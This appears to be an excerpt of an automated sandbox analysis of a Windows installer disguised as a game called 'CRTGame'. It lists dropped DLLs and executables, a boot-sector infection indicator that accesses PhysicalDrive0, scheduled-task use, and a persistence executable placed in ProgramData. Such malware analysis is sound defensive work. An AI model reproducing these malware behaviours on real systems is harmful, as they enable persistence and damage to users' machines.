Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-J1FBL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\bass_ofr.dll (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\wG1fFAzGfH.exe	File created: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-JKH63.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Users\user\AppData\Local\Temp\is-DSQM4.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-GV5KO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\uchardet.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-LOMUV.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\libmp4v2.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\libsox-3.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-2ASPL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\uninstall\is-3QRHG.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-B6UBH.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\libsoxr.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\bass_fx.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\bassflac.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\dsd2pcmt.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-M9T5O.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Users\user\AppData\Local\Temp\is-DSQM4.tmp\_isetup\_RegDLL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-B7IAM.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-UNJDD.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-1BOH7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-VFRK7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-J36DT.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\libwebp.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-IQEKE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\basswv.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-KHKMO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\swresample-4.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-2AGLA.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\dstt.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\crtgame.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\bass_aac.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-A2FB0.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-93I59.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\uninstall\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\libFLAC_dynamic.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-40RRA.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\basscd.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\bassalac.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-PV0J3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\wavpackdll.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-RPVR0.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-LPFO4.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\tak_deco_lib.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\libdtsdec.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-BEPVB.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\da.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\libwinpthread-1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\bass_tta.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\gain_analysis.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\bassopus.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-J5DR2.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-9INH5.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\sqlite3.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Users\user\AppData\Local\Temp\is-DSQM4.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\opusenc.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\mp3gain.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\pcm2dsd.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-C1J3V.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\bassmix.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\ff_helper.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\utils.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-0U5DK.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-JM3DF.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\libvorbis.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\bassape.dll (copy)	Jump to dropped file

Source: C:\Program Files (x86)\CRTGame\crtgame.exe

File created: C:\ProgramData\TAudioClass\TAudioClass.exe

Jump to dropped file

Boot Survival

Contains functionality to infect the boot sector

Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0		5_2_00401A58
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0		7_2_02C3F2AF

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Query

Source: C:\Program Files (x86)\CRTGame\crtgame.exe

5_2_004026F0

Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	1_2_00423C1C
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	1_2_00423C1C
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_004241EC IsIconic,SetActiveWindow,SetFocus,	1_2_004241EC
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_004241A4 IsIconic,SetActiveWindow,	1_2_004241A4
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	1_2_00418394
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	1_2_0042286C
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_004175A8 IsIconic,GetCapture,	1_2_004175A8
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_00417CDE IsIconic,SetWindowPos,	1_2_00417CDE
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	1_2_00417CE0
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_00481CB0 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,	1_2_00481CB0

Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp

Code function: 1_2_0044AEAC LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_0044AEAC

Source: C:\Users\user\Desktop\wG1fFAzGfH.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,		5_2_00401B54
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,		7_2_02C3F3B3

Source: C:\Program Files (x86)\CRTGame\crtgame.exe

Window / User API: threadDelayed 9806

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\daiso.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-0T8SC.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-FQCKS.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\basswma.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-GP3AQ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassmidi.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\takdec.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-UJSO3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-GNGP9.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\lame_enc.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-VKOGP.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-PTERI.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-P220F.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-F2AK9.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-NLS7L.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-TO8AC.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-V5C1L.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-3DI9V.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-9BPJ8.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\dsd2.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-8HTIS.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\d_writer.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-MOAUB.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DSQM4.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-CIN2V.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-T5S6S.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-6I8EB.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-5L10M.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-DDN59.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-VG2L5.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-FLLBO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\avutil-58.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\sd.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-NGO5I.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\rg_ebur128.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassdsd.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DSQM4.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-J1FBL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_ofr.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-JKH63.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DSQM4.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-GV5KO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\uchardet.dll (copy)	Jump to dropped file
